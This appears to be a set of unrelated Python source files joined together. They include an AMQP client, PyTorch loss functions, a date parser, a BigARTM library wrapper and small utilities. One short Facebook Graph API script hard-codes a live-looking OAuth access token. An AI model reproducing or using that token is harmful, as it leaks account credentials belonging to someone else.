# Collapses one-or-more dashes; used to split "A--B" interval strings.
_dashes_rx = re.compile('-+')
# Sub-pattern for a (possibly negative) float literal: "1", "1.5", ".5".
_float_subrx = r'(?:-\s*)?(?:\d+(?:\.\d+)?|\.\d+)'
# Matches durations such as "1d 2h 3min 4s".  All four components (days,
# hours, minutes, seconds) are optional and captured as groups 1-4; the
# caller must therefore check that at least one group actually matched.
_timedelta_rx = re.compile((r'\W*?(?:({flt})\s*d(?:ays?\W+)?\W*?)?'
                            r'(?:({flt})\s*h(?:(?:ou)?rs?\W+)?\W*?)?'
                            r'(?:({flt})\s*m(?:in(?:ute)?s?\W+)?\W*?)?'
                            r'(?:({flt})\s*s(?:ec(?:ond)?s?)?\W*?)?$')\
                           .format(flt=_float_subrx),
                           re.IGNORECASE)
def parse_datetime(dtstr, tz=None, exact=False, orig_val=None, **kwargs):
    """ Parses a string into a datetime object.

    Currently merely interprets the string as a timedelta, and adds it to now
    (plus a couple of easter-egg keywords).

    Keyword arguments:
        - dtstr: the string describing the datetime
        - tz: a timezone object to consider for parsing the datetime
              (currently, the datetime specified is assumed to be in the local
              time; the timezone cannot be specified as part of the string)
        - exact: whether an exact datetime should be returned, or whether
              microseconds should be ignored
        - orig_val: timezone will be copied from here if none was specified
              else

    Raises ValueError when the string cannot be interpreted.
    """
    # TODO Crude NLP.
    exact_dt = None
    # Try to use some keywords.
    keywords = [(re.compile(r"^\s*(?:the\s+)?end\s+of\s+(?:the\s+)?"
                            r"world(?:\s+(?:20|')12)?$"),
                 datetime(year=2012, month=12, day=21,
                          hour=11, minute=11, tzinfo=timezone.utc))]
    lower = dtstr.lower().strip()
    for keyword, dt in keywords:
        if keyword.match(lower):
            exact_dt = dt
            break
    # If keywords did not fire, interpret the string as a timedelta and add to
    # datetime.now().
    if exact_dt is None:
        if tz is None:
            # NOTE(review): `session` is not imported in this module's visible
            # header -- presumably supplied by another module at runtime;
            # confirm, otherwise this line raises NameError when tz is None.
            tz = session.config['TIMEZONE']
        try:
            exact_dt = datetime.now(tz) + parse_timedelta(dtstr)
        except ValueError:
            raise ValueError('Could not parse datetime from "{arg}".'\
                             .format(arg=dtstr))
    # Try to supply the timezone from the original value.
    if (exact_dt.tzinfo is None and orig_val is not None
            and orig_val.tzinfo is not None):
        exact_dt = exact_dt.replace(tzinfo=orig_val.tzinfo)
    # Round out microseconds (that's part of NLP) unless asked to return the
    # exact datetime.
    return exact_dt if exact else exact_dt.replace(microsecond=0)
def parse_timedelta(timestr, **kwargs):
    """Parse a string into a timedelta object.

    Accepts either the "Nd Nh Nm Ns" style understood by ``_timedelta_rx``
    or a bare float, which is interpreted as an amount of minutes.  Raises
    ValueError when neither interpretation succeeds.
    """
    match = _timedelta_rx.match(timestr)
    if match is not None:
        groups = match.groups()
        # Groups arrive in (days, hours, minutes, seconds) order; absent
        # components count as zero.
        amounts = []
        for group_text in groups:
            if not group_text:
                amounts.append(0)
                continue
            try:
                amounts.append(float(group_text))
            except ValueError:
                raise ValueError('Could not parse float from {grp}.'\
                                 .format(grp=group_text))
        # Every component is optional in the regex, so require that at least
        # one was actually supplied before trusting the match.
        if any(groups):
            days, hours, minutes, seconds = amounts
            return timedelta(days=days, hours=hours,
                             minutes=minutes, seconds=seconds)
    # The regex did not (usefully) match: fall back to reading the whole
    # string as a float amount of minutes.
    try:
        return timedelta(minutes=float(timestr))
    except ValueError:
        raise ValueError('Could not parse duration from "{arg}".'\
                         .format(arg=timestr))
def parse_interval(ivalstr, tz=None, exact=False, **kwargs):
    """ Parses a string into an Interval object.

    Keyword arguments:
        - ivalstr: the string specifying the interval, either a keyword
              (currently only 'today') or the form A--B where A and B are
              datetime strings (either may be empty for an open end)
        - tz: a timezone object to consider for parsing the interval
              (currently, the interval specified is assumed to be in the local
              time; the timezone cannot be specified as part of the string)
        - exact: whether the border datetimes for the interval should be
              interpreted exactly, or whether microseconds should be ignored

    Raises ValueError when the string cannot be interpreted.
    """
    now = datetime.now(tz)
    # Try to use some keywords.
    keywords = {'today': (daystart(now, tz), dayend(now, tz))}
    ivalstr = ivalstr.strip()
    if ivalstr.lower() in keywords:
        start, end = keywords[ivalstr.lower()]
        return Interval(start, end)
    # Parse the interval in the form A--B.  Split on the first dash run only
    # (maxsplit=1): the previous maxsplit of 2 yielded three fields -- and
    # hence an unpacking ValueError -- whenever the remainder contained a
    # second run of dashes.  (The redundant second .strip() is also gone;
    # ivalstr was already stripped above.)
    start, end = _dashes_rx.split(ivalstr, 1)
    start = parse_datetime(start, tz=tz, exact=exact) if start else None
    end = parse_datetime(end, tz=tz, exact=exact) if end else None
    return Interval(start, end)
def parse_grouping(grpstr, **kwargs):
    """Parses a string into a Grouping object.

    Not implemented yet: always raises NotImplementedError.  (The previous
    body also contained a dead ``tokens = list()`` assignment and an
    unreachable ``len(tokens)`` statement after the raise; both removed.)
    """
    # TODO Tokenise grpstr and build a SoeGrouping from the token stream.
    raise NotImplementedError('Implement parse_grouping.')
# Maps supported value types to their dedicated parser functions; types not
# listed here fall back to default_parser() via get_parser().
_type2parser = {datetime: parse_datetime,
                timedelta: parse_timedelta,
                SoeGrouping: parse_grouping}
@lru_cache(maxsize=5)
def default_parser(type_):
    """Build a fallback parser for *type_*.

    The returned callable simply applies ``type_`` to its first argument
    (as in ``int("8")``) and throws away any extra positional or keyword
    arguments a parser call might supply.  Parsers for the five most
    recently requested types are memoised.
    """
    return lambda instr, *args, **kwargs: type_(instr)
def get_parser(type_):
    """Returns a parser for the given type. Parsers convert strings into
    objects of that type.

    Types without an entry in _type2parser fall back to default_parser,
    which applies the type itself, as in int("8").
    """
    try:
        return _type2parser[type_]
    except KeyError:
        return default_parser(type_)
|
# -*- coding: utf-8 -*-
# @Author: 1uci3n
# @Date: 2021-10-07 17:59:35
# @Last Modified by: 1uci3n
# @Last Modified time: 2021-10-07 17:59:55
class Solution:
    def isPalindrome(self, x: int) -> bool:
        """Return True iff the decimal digits of x read the same forwards
        and backwards, without converting x to a string.

        Negatives are never palindromes (the sign appears on one side only);
        single digits trivially are.
        """
        if x < 0:
            return False
        if x < 10:
            return True
        # Collect the decimal digits, least significant first.
        digits = []
        while x > 0:
            digits.append(x % 10)
            x //= 10
        # Compare the first half against the mirrored second half.  A single
        # range over len // 2 covers both parities -- the middle digit of an
        # odd-length number needs no check, and (len - 1) // 2 == len // 2
        # for odd lengths, so the original duplicated even/odd loops were
        # identical in effect.
        for i in range(len(digits) // 2):
            if digits[i] != digits[-i - 1]:
                return False
        return True
'''Utility functions'''
import collections
import collections.abc
def flatten(parent_dict, parent_key='', sep='_'):
    '''Flatten a nested dict into a single layer.

    Nested keys are joined with *sep*: {'a': {'b': 1}} becomes {'a_b': 1}.
    Non-mapping values are kept as-is.  Assumes all keys are strings.
    '''
    items = []
    for key, val in parent_dict.items():
        new_key = parent_key + sep + key if parent_key else key
        # collections.MutableMapping was removed in Python 3.10; the ABC
        # lives in collections.abc.
        if isinstance(val, collections.abc.MutableMapping):
            items.extend(flatten(val, new_key, sep=sep).items())
        else:
            items.append((new_key, val))
    return dict(items)
|
# coding: utf-8
from twisted.internet import defer, protocol
from twisted.internet.task import LoopingCall
from twisted.protocols import basic
from txamqp import spec
from txamqp.codec import Codec
from txamqp.connection import Header, Frame, Method, Body, Heartbeat
from txamqp.message import Message
from txamqp.content import Content
from txamqp.queue import TimeoutDeferredQueue, Closed as QueueClosed
from txamqp.client import TwistedEvent, Closed
from cStringIO import StringIO
import struct
from time import time
class GarbageException(Exception):
    """Raised when the incoming byte stream cannot be parsed as AMQP frames
    (e.g. a frame that does not terminate with the frame-end octet)."""
# An AMQP channel is a virtual connection that shares the
# same socket with others channels. One can have many channels
# per connection
class AMQChannel(object):
    """One virtual AMQP channel multiplexed over the shared connection.

    Outgoing frames are pushed onto the connection-wide `outgoing` queue;
    incoming frames are routed by dispatch() into either `responses`
    (replies to methods we sent) or `incoming` (server-initiated methods).
    """
    def __init__(self, id, outgoing):
        self.id = id
        self.outgoing = outgoing
        self.incoming = TimeoutDeferredQueue()
        self.responses = TimeoutDeferredQueue()
        # Points at whichever queue received the most recent Method frame so
        # that the header/body frames that follow land on the same queue.
        self.queue = None
        self.closed = False
        self.reason = None
    def close(self, reason):
        """Mark the channel closed and close both frame queues (idempotent)."""
        if self.closed:
            return
        self.closed = True
        self.reason = reason
        self.incoming.close()
        self.responses.close()
    def dispatch(self, frame, work):
        """Route an incoming frame to the proper queue.

        Method frames flagged as responses go to `responses`; other method
        frames go to `incoming` and announce this channel on the
        connection-level `work` queue.  Non-method frames (header/body)
        follow whichever queue the last method frame selected.
        """
        payload = frame.payload
        if isinstance(payload, Method):
            if payload.method.response:
                self.queue = self.responses
            else:
                self.queue = self.incoming
                work.put(self.incoming)
        self.queue.put(frame)
    @defer.inlineCallbacks
    def invoke(self, method, args, content=None):
        """Send an AMQP method frame and, unless nowait, wait for its reply.

        Fires the returned Deferred with a Message wrapping the response
        method (and any content), raises ValueError on an unexpected
        response method, and raises Closed when the channel is shut down.
        """
        if self.closed:
            raise Closed(self.reason)
        frame = Frame(self.id, Method(method, *args))
        self.outgoing.put(frame)
        if method.content:
            if content == None:
                content = Content()
            self.writeContent(method.klass, content, self.outgoing)
        try:
            # here we depend on all nowait fields being named nowait
            f = method.fields.byname["nowait"]
            nowait = args[method.fields.index(f)]
        except KeyError:
            nowait = False
        try:
            if not nowait and method.responses:
                resp = (yield self.responses.get()).payload
                if resp.method.content:
                    content = yield readContent(self.responses)
                else:
                    content = None
                if resp.method in method.responses:
                    defer.returnValue(Message(resp.method, resp.args, content))
                else:
                    raise ValueError(resp)
        except QueueClosed, e:
            # The response queue was torn down while waiting: surface it as
            # Closed when we were shut down deliberately, else re-raise.
            if self.closed:
                raise Closed(self.reason)
            else:
                raise e
    def writeContent(self, klass, content, queue):
        """Encode `content` onto `queue`: header frame, children, then body."""
        size = content.size()
        header = Frame(self.id, Header(klass, content.weight(), size, **content.properties))
        queue.put(header)
        for child in content.children:
            self.writeContent(klass, child, queue)
        # should split up if content.body exceeds max frame size
        if size > 0:
            queue.put(Frame(self.id, Body(content.body)))
class FrameReceiver(protocol.Protocol, basic._PauseableMixin):
    """Twisted protocol that turns a byte stream into AMQP frames.

    Mirrors basic.LineReceiver's two-mode design: frame mode parses the
    buffer into frames, raw mode hands bytes straight to rawDataReceived.
    """

    frame_mode = False
    MAX_LENGTH = 4096
    # Frame header: type (1 octet) + channel (2) + size (4) + 1 payload octet.
    HEADER_LENGTH = 1 + 2 + 4 + 1
    __buffer = ''

    def __init__(self, spec):
        self.spec = spec
        # Octet value that must terminate every frame on the wire.
        self.FRAME_END = self.spec.constants.bypyname["frame_end"].id

    # packs a frame and writes it to the underlying transport
    def sendFrame(self, frame):
        data = self._packFrame(frame)
        self.transport.write(data)

    # packs a frame, see qpid.connection.Connection#write
    def _packFrame(self, frame):
        s = StringIO()
        c = Codec(s)
        c.encode_octet(self.spec.constants.bypyname[frame.payload.type].id)
        c.encode_short(frame.channel)
        frame.payload.encode(c)
        c.encode_octet(self.FRAME_END)
        data = s.getvalue()
        return data

    # unpacks a frame, see qpid.connection.Connection#read
    def _unpackFrame(self, data):
        s = StringIO(data)
        c = Codec(s)
        frameType = spec.pythonize(self.spec.constants.byid[c.decode_octet()].name)
        channel = c.decode_short()
        payload = Frame.DECODERS[frameType].decode(self.spec, c)
        end = c.decode_octet()
        # A wrong trailing octet means we lost sync with the stream.
        if end != self.FRAME_END:
            raise GarbageException('frame error: expected %r, got %r' % (self.FRAME_END, end))
        frame = Frame(channel, payload)
        return frame

    def setRawMode(self):
        # Switch to raw mode: bytes will be delivered via rawDataReceived.
        self.frame_mode = False

    def setFrameMode(self, extra=''):
        # Switch to frame mode; ``extra`` is leftover raw data to reparse now.
        self.frame_mode = True
        if extra:
            return self.dataReceived(extra)

    def dataReceived(self, data):
        # Accumulate and greedily parse complete frames from the buffer.
        self.__buffer = self.__buffer + data
        while self.frame_mode and not self.paused:
            # sz: bytes available beyond a complete frame header.
            sz = len(self.__buffer) - self.HEADER_LENGTH
            if sz >= 0:
                length, = struct.unpack("!I", self.__buffer[3:7]) # size = 4 bytes
                if sz >= length:
                    packet = self.__buffer[:self.HEADER_LENGTH + length]
                    self.__buffer = self.__buffer[self.HEADER_LENGTH + length:]
                    frame = self._unpackFrame(packet)
                    why = self.frameReceived(frame)
                    if why or self.transport and self.transport.disconnecting:
                        return why
                    else:
                        continue
            if len(self.__buffer) > self.MAX_LENGTH:
                frame, self.__buffer = self.__buffer, ''
                return self.frameLengthExceeded(frame)
            break
        else:
            # while/else: reached only when frame mode is off (raw mode).
            if not self.paused:
                data = self.__buffer
                self.__buffer = ''
                if data:
                    return self.rawDataReceived(data)

    def sendInitString(self):
        # AMQP protocol header: "AMQP" + protocol id octets + spec version.
        initString = "!4s4B"
        s = StringIO()
        c = Codec(s)
        c.pack(initString, "AMQP", 1, 1, self.spec.major, self.spec.minor)
        self.transport.write(s.getvalue())
@defer.inlineCallbacks
def readContent(queue):
    """Assemble a full Content (header, nested children, body) from ``queue``."""
    header_frame = yield queue.get()
    header = header_frame.payload
    # The header's weight is the number of nested content children that follow.
    children = []
    for _ in range(header.weight):
        child = yield readContent(queue)
        children.append(child)
    # The body may arrive split over several Body frames; gather until complete.
    chunks = []
    remaining = header.size
    while remaining > 0:
        body_frame = yield queue.get()
        chunk = body_frame.payload.content
        chunks.append(chunk)
        remaining -= len(chunk)
    defer.returnValue(Content(''.join(chunks), children, header.properties.copy()))
class AMQClient(FrameReceiver):
    """AMQP client protocol: multiplexes channels over one frame stream,
    drives heartbeats, and hands decoded methods to a delegate.
    """

    # Class used for channel objects created by self.channel().
    channelClass = AMQChannel

    # Max unreceived heartbeat frames. The AMQP standard says it's 3.
    MAX_UNSEEN_HEARTBEAT = 3

    def __init__(self, delegate, vhost, spec, heartbeat=0, clock=None, insist=False):
        FrameReceiver.__init__(self, spec)
        self.delegate = delegate
        # XXX Cyclic dependency
        self.delegate.client = self
        self.vhost = vhost
        # Mix the channel class with the spec-generated method class so the
        # spec's protocol methods appear directly on channel objects.
        self.channelFactory = type("Channel%s" % self.spec.klass.__name__,
                                   (self.channelClass, self.spec.klass), {})
        self.channels = {}
        self.channelLock = defer.DeferredLock()
        self.outgoing = defer.DeferredQueue()
        self.work = defer.DeferredQueue()
        self.started = TwistedEvent()
        self.queueLock = defer.DeferredLock()
        self.basic_return_queue = TimeoutDeferredQueue()
        self.queues = {}
        # Arm the writer/worker pump loops (each re-arms itself on callback).
        self.outgoing.get().addCallback(self.writer)
        self.work.get().addCallback(self.worker)
        self.heartbeatInterval = heartbeat
        self.insist = insist
        if self.heartbeatInterval > 0:
            if clock is None:
                from twisted.internet import reactor as clock
            self.clock = clock
            # Drop the connection after MAX_UNSEEN_HEARTBEAT silent intervals.
            self.checkHB = self.clock.callLater(self.heartbeatInterval *
                                                self.MAX_UNSEEN_HEARTBEAT, self.checkHeartbeat)
            self.sendHB = LoopingCall(self.sendHeartbeat)
            d = self.started.wait()
            d.addCallback(lambda _: self.reschedule_sendHB())
            d.addCallback(lambda _: self.reschedule_checkHB())

    def reschedule_sendHB(self):
        """Restart the outgoing-heartbeat loop (called after any send)."""
        if self.heartbeatInterval > 0:
            if self.sendHB.running:
                self.sendHB.stop()
            self.sendHB.start(self.heartbeatInterval, now=False)

    def reschedule_checkHB(self):
        """Push back the missed-heartbeat deadline (called on any receive)."""
        if self.checkHB.active():
            self.checkHB.cancel()
        self.checkHB = self.clock.callLater(self.heartbeatInterval *
                                            self.MAX_UNSEEN_HEARTBEAT, self.checkHeartbeat)

    def check_0_8(self):
        # True when the loaded spec is AMQP 0-8 (note the minor/major order
        # used here follows the spec object's convention).
        return (self.spec.minor, self.spec.major) == (0, 8)

    @defer.inlineCallbacks
    def channel(self, id):
        """Return (creating on first use) the channel object for ``id``."""
        yield self.channelLock.acquire()
        try:
            try:
                ch = self.channels[id]
            except KeyError:
                ch = self.channelFactory(id, self.outgoing)
                self.channels[id] = ch
        finally:
            self.channelLock.release()
        defer.returnValue(ch)

    @defer.inlineCallbacks
    def queue(self, key):
        """Return (creating on first use) the consumer queue for ``key``."""
        yield self.queueLock.acquire()
        try:
            try:
                q = self.queues[key]
            except KeyError:
                q = TimeoutDeferredQueue()
                self.queues[key] = q
        finally:
            self.queueLock.release()
        defer.returnValue(q)

    def close(self, reason):
        """Close every channel and queue, then notify the delegate."""
        for ch in self.channels.values():
            ch.close(reason)
        for q in self.queues.values():
            q.close()
        self.delegate.close(reason)

    def writer(self, frame):
        # Pump loop: write one frame, then re-arm for the next.
        self.sendFrame(frame)
        self.outgoing.get().addCallback(self.writer)

    def worker(self, queue):
        # Pump loop: dispatch one queue of work, then re-arm; a failure
        # closes the whole client via the errback.
        d = self.dispatch(queue)
        def cb(ign):
            self.work.get().addCallback(self.worker)
        d.addCallback(cb)
        d.addErrback(self.close)

    @defer.inlineCallbacks
    def dispatch(self, queue):
        """Read one method frame (plus its content, if any) and deliver it."""
        frame = yield queue.get()
        channel = yield self.channel(frame.channel)
        payload = frame.payload
        if payload.method.content:
            content = yield readContent(queue)
        else:
            content = None
        # Let the caller deal with exceptions thrown here.
        message = Message(payload.method, payload.args, content)
        self.delegate.dispatch(channel, message)

    # As soon as we connect to the target AMQP broker, send the init string
    def connectionMade(self):
        self.sendInitString()
        self.setFrameMode()

    def frameReceived(self, frame):
        self.processFrame(frame)

    def sendFrame(self, frame):
        # Any non-heartbeat traffic proves liveness, so reset the send timer.
        if frame.payload.type != Frame.HEARTBEAT:
            self.reschedule_sendHB()
        FrameReceiver.sendFrame(self, frame)

    @defer.inlineCallbacks
    def processFrame(self, frame):
        """Route an inbound frame to its channel; any traffic resets the
        missed-heartbeat deadline."""
        ch = yield self.channel(frame.channel)
        if frame.payload.type == Frame.HEARTBEAT:
            self.lastHBReceived = time()
        else:
            ch.dispatch(frame, self.work)
        if self.heartbeatInterval > 0:
            self.reschedule_checkHB()

    @defer.inlineCallbacks
    def authenticate(self, username, password, mechanism='AMQPLAIN', locale='en_US'):
        """Build the SASL response for the spec version and start the session."""
        if self.check_0_8():
            response = {"LOGIN": username, "PASSWORD": password}
        else:
            response = "\0" + username + "\0" + password
        yield self.start(response, mechanism, locale)

    @defer.inlineCallbacks
    def start(self, response, mechanism='AMQPLAIN', locale='en_US'):
        """Wait for connection start, then open the configured vhost."""
        self.response = response
        self.mechanism = mechanism
        self.locale = locale
        yield self.started.wait()
        channel0 = yield self.channel(0)
        if self.check_0_8():
            # AMQP 0-8 still supports the (long deprecated) insist flag.
            result = yield channel0.connection_open(self.vhost, insist=self.insist)
        else:
            result = yield channel0.connection_open(self.vhost)
        defer.returnValue(result)

    def sendHeartbeat(self):
        self.sendFrame(Frame(0, Heartbeat()))
        self.lastHBSent = time()

    def checkHeartbeat(self):
        # Deadline expired with no inbound traffic: drop the connection.
        if self.checkHB.active():
            self.checkHB.cancel()
        self.transport.loseConnection()

    def connectionLost(self, reason):
        # Stop the heartbeat machinery before tearing everything down.
        if self.heartbeatInterval > 0:
            if self.sendHB.running:
                self.sendHB.stop()
            if self.checkHB.active():
                self.checkHB.cancel()
        self.close(reason)
|
import torch
from torch import nn
import math
class LandmarkLoss(nn.Module):
    """Wing-loss criterion over a fixed number of 2-D landmarks."""

    def __init__(self, n_landmark=98):
        super(LandmarkLoss, self).__init__()
        self.n_landmark = n_landmark  # landmarks per sample

    def forward(self, landmark_gt, landmark_pred):
        """Return the wing loss between ground truth and prediction."""
        return wing_loss(landmark_gt, landmark_pred, N_LANDMARK=self.n_landmark)
def wing_loss(y_true, y_pred, N_LANDMARK, w=10.0, epsilon=2.0):
    """Wing loss (Feng et al., CVPR 2018) for landmark regression.

    Residuals smaller than ``w`` are penalised on a log curve (steeper than
    L1 near zero); larger residuals use a shifted L1 so the two pieces join
    continuously at |x| == w. Returns the batch-mean of the per-sample sums.
    """
    pred = y_pred.reshape(-1, N_LANDMARK, 2)
    true = y_true.reshape(-1, N_LANDMARK, 2)
    residual = torch.abs(true - pred)
    # Offset that makes the log branch and the linear branch meet at |x| == w.
    c = w * (1.0 - math.log(1.0 + w / epsilon))
    small = w * torch.log(1.0 + residual / epsilon)
    large = residual - c
    losses = torch.where(residual < w, small, large)
    # Sum over landmarks and coordinates, then average over the batch.
    return torch.mean(torch.sum(losses, axis=[1, 2]), axis=0)
|
#!/usr/bin/python
import json
import facebook
##data = urllib2.urlopen('http://graph.facebook.com/alswblog/').read()
# NOTE(review): a live OAuth access token is hard-coded here — these expire
# and must never be committed to source control; load it from the environment.
access_token = 'CAAMzCQes4NkBAORJ93mpnXb3cjwbaFOuN5xiUU87enAdOZC9v4agnF4yZBN9bw6QaM6xjnYb3cuMIE8wBZBqDL3vDeHYBAjNrpJFzAzi1kBX7GHBel4NIh1Cqvkazqpjv0o5J6GrTtzWKnkZADehk3P16nwxEwioLCgOVRCpaj6njqyTrydim70G875gGUSKppMZAuqKt9dgzzszc1kbB'
# Graph API object id of the page being queried.
getalsw = '755321211189697'
graph = facebook.GraphAPI(access_token)
data = graph.get_object(getalsw)
# NOTE(review): in the Graph API 'likes'/'data' is normally a *list* of like
# objects, so ['data']['id'] would raise TypeError — ['data'][0]['id'] was
# probably intended; verify against an actual response.
print data['likes']['data']['id']
#json_data = json.loads(data)
#print ('%s') % (json_data['hours']['mon_1_open'])
|
"""
Implementation of wrapper API
"""
import os
import sys
import ctypes
import numpy
from google import protobuf
from . import utils
from .exceptions import ARTM_EXCEPTION_BY_CODE
from .spec import ARTM_API
class LibArtm(object):
    """ctypes wrapper around the BigARTM shared library.

    Loads the shared library and exposes every function described in
    ARTM_API as a Python method that casts arguments, checks the returned
    error code and decodes protobuf results.
    """

    def __init__(self, lib_name=None):
        # lib_name: explicit name/path of the shared library; when None, the
        # ARTM_SHARED_LIBRARY env var and then a per-platform default is used.
        self.cdll = self._load_cdll(lib_name)
        # adding specified functions
        for spec in ARTM_API:
            func = self.cdll[spec.name]
            setattr(self, spec.name, self._wrap_call(func, spec))
            # TODO: add docstring for wrapped function

    def _load_cdll(self, lib_name):
        """Locate and load the artm shared library; raise OSError with an
        actionable message when it cannot be loaded."""
        # choose default library name
        default_lib_name = 'libartm.so'
        if sys.platform.startswith('win'):
            default_lib_name = 'artm.dll'
        if sys.platform.startswith('darwin'):
            default_lib_name = 'artm.dylib'
        if lib_name is None:
            # try to get library path from environment variable
            lib_name = os.environ.get('ARTM_SHARED_LIBRARY')
            if lib_name is None:
                # set the default library name
                lib_name = default_lib_name
        try:
            cdll = ctypes.CDLL(lib_name)
        except OSError as e:
            # NOTE(review): ``e.message`` is Python-2-only; under Python 3
            # this line itself raises AttributeError — confirm target version.
            exception_message = (
                e.message + '\n'
                'Failed to load artm shared library. '
                'Try to add the location of `{default_lib_name}` file into your PATH '
                'system variable, or to set ARTM_SHARED_LIBRARY - a specific system variable '
                'which may point to `{default_lib_name}` file, including the full path.'
            ).format(**locals())
            raise OSError(exception_message)
        return cdll

    def _check_error(self, error_code):
        """Raise the mapped ARTM exception for error codes below -1.

        Codes >= -1 are treated as success / benign; anything smaller
        carries an error whose message is fetched from the library.
        """
        if error_code < -1:
            self.cdll.ArtmGetLastErrorMessage.restype = ctypes.c_char_p
            error_message = self.cdll.ArtmGetLastErrorMessage()
            # remove exception name from error message
            error_message = error_message.split(':', 1)[-1].strip()
            exception_class = ARTM_EXCEPTION_BY_CODE.get(error_code)
            if exception_class is not None:
                raise exception_class(error_message)
            else:
                raise RuntimeError(error_message)

    def _get_requested_message(self, length, func):
        """Copy the pending result blob of ``length`` bytes out of the
        library and parse it with the message factory ``func``."""
        message_blob = ctypes.create_string_buffer(length)
        error_code = self.cdll.ArtmCopyRequestResult(length, message_blob)
        self._check_error(error_code)
        message = func()
        # NOTE(review): ParseFromString is given the ctypes buffer object;
        # protobuf normally expects bytes (message_blob.raw) — confirm this
        # works with the protobuf version in use.
        message.ParseFromString(message_blob)
        return message

    def _wrap_call(self, func, spec):
        """Return a Python callable wrapping C function ``func`` per ``spec``
        (argument casting, error checking, optional protobuf result)."""

        def artm_api_call(*args):
            # check the number of arguments
            n_args_given = len(args)
            n_args_takes = len(spec.arguments)
            if n_args_given != n_args_takes:
                raise TypeError('{func_name} takes {n_takes} argument ({n_given} given)'.format(
                    func_name=spec.name,
                    n_takes=n_args_takes,
                    n_given=n_args_given,
                ))

            c_args = []
            for (arg_pos, arg_value), (arg_name, arg_type) in zip(enumerate(args), spec.arguments):
                # try to cast argument to the required type
                arg_casted = arg_value
                if issubclass(arg_type, protobuf.message.Message) and isinstance(arg_value, dict):
                    # dict -> protobuf message
                    arg_casted = utils.dict_to_message(arg_value, arg_type)

                # check argument type
                if not isinstance(arg_casted, arg_type):
                    raise TypeError('Argument {arg_position} ({arg_name}) should have '
                                    'type {arg_type} but {given_type} given'.format(
                                        arg_position=arg_pos,
                                        arg_name=arg_name,
                                        arg_type=str(arg_type),
                                        given_type=str(type(arg_value)),
                                    ))
                arg_value = arg_casted

                # construct c-style arguments
                # NOTE(review): ``basestring`` is Python-2-only — confirm
                # the supported interpreter version.
                if issubclass(arg_type, basestring):
                    arg_cstr_p = ctypes.create_string_buffer(arg_value)
                    c_args.append(arg_cstr_p)

                elif issubclass(arg_type, protobuf.message.Message):
                    # protobuf messages are passed as (length, serialized bytes)
                    message_str = arg_value.SerializeToString()
                    message_cstr_p = ctypes.create_string_buffer(message_str)
                    c_args += [len(message_str), message_cstr_p]

                elif issubclass(arg_type, numpy.ndarray):
                    # ndarrays are passed as (byte count, raw data pointer)
                    c_args += [arg_value.nbytes, ctypes.c_char_p(arg_value.ctypes.data)]

                else:
                    c_args.append(arg_value)

            # make api call
            if spec.result_type is not None:
                func.restype = spec.result_type
            result = func(*c_args)
            self._check_error(result)

            # return result value
            if spec.request_type is not None:
                # a successful call's result is the byte length of the
                # protobuf answer waiting to be copied out
                return self._get_requested_message(length=result, func=spec.request_type)
            if spec.result_type is not None:
                return result

        return artm_api_call
|
from neuralpp.util.group import Group
class BruteForce:
    """Exact inference by brute force: multiply all factors, then marginalise."""

    @staticmethod
    def run(query, factors):
        """Return the normalised marginal of ``query`` under ``factors``."""
        joint = Group.product(factors)
        # Every variable mentioned by any factor, except the query itself.
        to_eliminate = {var for factor in factors for var in factor.variables if var != query}
        return (joint ^ to_eliminate).normalize()
|
# This File will contains Loss Function
# This File is to eable Package import, will mostly keep it blank
import os
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import warnings
warnings.simplefilter("ignore")
class DiceLoss(nn.Module):
    """Soft dice loss on sigmoid(logits) vs. binary targets.

    ``eps`` now guards the denominator as well as the numerator: without it,
    an all-empty prediction/target pair makes ``union`` ~0 and the ratio
    explodes into a huge negative loss instead of the correct ~0.
    """

    def __init__(self, eps: float = 1e-9):
        super(DiceLoss, self).__init__()
        self.eps = eps  # smoothing term for numerical stability

    def forward(self,
                logits: torch.Tensor,
                targets: torch.Tensor) -> torch.Tensor:
        """Return ``1 - dice_score`` computed over the whole batch."""
        num = targets.size(0)
        probability = torch.sigmoid(logits)
        probability = probability.view(num, -1)
        targets = targets.view(num, -1)
        assert(probability.shape == targets.shape)
        intersection = 2.0 * (probability * targets).sum()
        union = probability.sum() + targets.sum()
        # eps in BOTH terms keeps the score finite and ~1 when union ~ 0.
        dice_score = (intersection + self.eps) / (union + self.eps)
        return 1.0 - dice_score
class BCEDiceLoss(nn.Module):
    """Sum of binary cross-entropy (on logits) and soft dice loss."""

    def __init__(self):
        super(BCEDiceLoss, self).__init__()
        self.bce = nn.BCEWithLogitsLoss()
        self.dice = DiceLoss()

    def forward(self,
                logits: torch.Tensor,
                targets: torch.Tensor) -> torch.Tensor:
        """Return bce(logits, targets) + dice(logits, targets)."""
        assert(logits.shape == targets.shape)
        return self.bce(logits, targets) + self.dice(logits, targets)
|
import torch
from sequence_generator import SequenceGenerator
import config
import argparse
from preprocess import read_tokenized_src_file
from utils.data_loader import load_vocab
from pykp.io import build_interactive_predict_dataset, KeyphraseDataset
from torch.utils.data import DataLoader
import predict
import os
def process_opt(opt):
    """Normalise parsed CLI options for prediction.

    Seeds the RNG, selects the device, builds the experiment-name suffix,
    resolves/creates the prediction output directory, and sanity-checks the
    one2many flag combination. Returns the mutated ``opt``.
    """
    if opt.seed > 0:
        torch.manual_seed(opt.seed)

    if torch.cuda.is_available():
        if not opt.gpuid:
            opt.gpuid = 0
        opt.device = torch.device("cuda:%d" % opt.gpuid)
    else:
        opt.device = torch.device("cpu")
        opt.gpuid = -1
        print("CUDA is not available, fall back to CPU.")

    # Encode the active options into the experiment name; the append order
    # matters for reproducing previously created experiment directories.
    opt.exp = 'predict.' + opt.exp
    if opt.one2many:
        opt.exp += '.one2many'
        if opt.one2many_mode == 1:
            opt.exp += '.cat'
    if opt.copy_attention:
        opt.exp += '.copy'
    if opt.coverage_attn:
        opt.exp += '.coverage'
    if opt.review_attn:
        opt.exp += '.review'
    if opt.orthogonal_loss:
        opt.exp += '.orthogonal'
    if opt.use_target_encoder:
        opt.exp += '.target_encode'
    if hasattr(opt, 'bidirectional') and opt.bidirectional:
        opt.exp += '.bi-directional'
    else:
        opt.exp += '.uni-directional'

    # fill time into the name
    if opt.pred_path.find('%s') > 0:
        opt.pred_path = opt.pred_path % (opt.exp, opt.timemark)

    if not os.path.exists(opt.pred_path):
        os.makedirs(opt.pred_path)

    # one2many and one2many_mode must be enabled together.
    if not opt.one2many and opt.one2many_mode > 0:
        raise ValueError("You cannot choose one2many mode without the -one2many options.")
    if opt.one2many and opt.one2many_mode == 0:
        raise ValueError("If you choose one2many, you must specify the one2many mode.")
    #if opt.greedy and not opt.one2many:
